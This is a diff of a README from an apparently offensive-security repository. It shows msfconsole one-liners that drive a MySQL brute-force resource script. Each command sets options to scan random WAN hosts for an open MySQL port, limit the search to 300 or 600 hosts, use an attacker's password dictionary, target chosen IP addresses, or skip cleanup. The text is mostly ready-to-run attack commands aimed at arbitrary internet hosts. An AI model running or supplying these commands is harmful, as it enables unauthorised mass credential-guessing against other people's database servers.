r00t-3xp10it/resource_files/README.md

 > Adicionally to the described settings we can also combine diferent configurations at runtime execution.

-- instruct the resource script to search in WAN for rhosts with service port open and limmit the search to 300 rhosts
+Instruct the resource script to search in WAN for rhosts with service port open and limmit the search to 300 rhosts

       msfconsole -q -x 'setg RANDOM_HOSTS true;setg LIMMIT 300;resource /root/mysql_brute.rc'

-- instruct the resource script to use attackers dicionary file (absoluct path required)
+Instruct the resource script to use attackers dicionary file (absoluct path required)

       msfconsole -q -x 'setg USERPASS_FILE /root/dicionary.txt;resource /root/mysql_brute.rc'

-- instruct the resource script to scan rhosts input by attacker, and use the attacker dicionary file
+Instruct the resource script to scan rhosts input by attacker, and use the attacker dicionary file

       msfconsole -q -x 'setg RHOSTS 10.10.10.1 10.10.11.2;setg USERPASS_FILE /root/dicionary.txt;resource /root/mysql_brute.rc'

-- instruct the resource script to not clean database at exit, scan WAN for rhosts and limmit search to 600 rhosts
+Instruct the resource script to not clean database at exit, scan WAN for rhosts and limmit search to 600 rhosts

       msfconsole -q -x 'setg CLEAN false;setg RANDOM_HOSTS true;setg LIMMIT 600;resource /root/mysql_brute.rc'